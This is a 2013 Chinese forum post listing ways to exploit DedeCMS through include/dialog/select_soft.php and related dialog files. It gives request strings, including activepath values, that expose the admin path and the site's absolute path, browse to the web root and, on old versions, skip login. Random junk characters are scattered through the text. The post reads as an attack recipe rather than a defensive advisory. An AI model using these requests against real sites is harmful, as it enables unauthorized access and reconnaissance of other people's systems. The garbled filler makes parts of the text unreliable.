1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理+ f% Y2 G! {1 ?2 M1 g
& U$ W i7 G( ]; T1 p
员帐号,新版本的就直接转向了后台.: J1 c" v; _% @
( j E i; ~8 l) z2.include/dialog/config.php会爆出后台管理路径
! D( B5 e: J6 I% L. Q9 q' R5 A% W; M7 `! x; V9 \
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
?9 H2 }3 b! z) g( J' X
% M& J" P$ S, G4 v: J3 M1 j4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.: L8 p! B0 P, |; C
[. _$ B# u; j; R, L
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
$ z) b1 B, T( I' N7 ^+ |
! L- T" N9 Z4 w& N到根目录去.不过这些版本的访问地址有些不同.+ w; Q9 w; f1 W. m3 J
地址为require/dialog/select_soft.php?activepath=/././././././././
- ^2 D& Z. C Z6 l
6 i& L+ n% w. D }$ }$ vinclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦.., V! M1 b8 F' X8 \
存在相同问题的文件还有
+ k" [& a2 z; c5 @4 _4 P$ p4 ?4 Zinclude\dialog\select_images.php- @6 J3 t/ I5 b* V M( |& m
include\dialog\select_media.php" b* m! H! T! F5 B: m9 z; P( B
include\dialog\select_templets.php# @: Q* d7 i2 J! F* d& S4 g& s
|
发表于 2013-4-16 16:50:43
收藏
支持
反对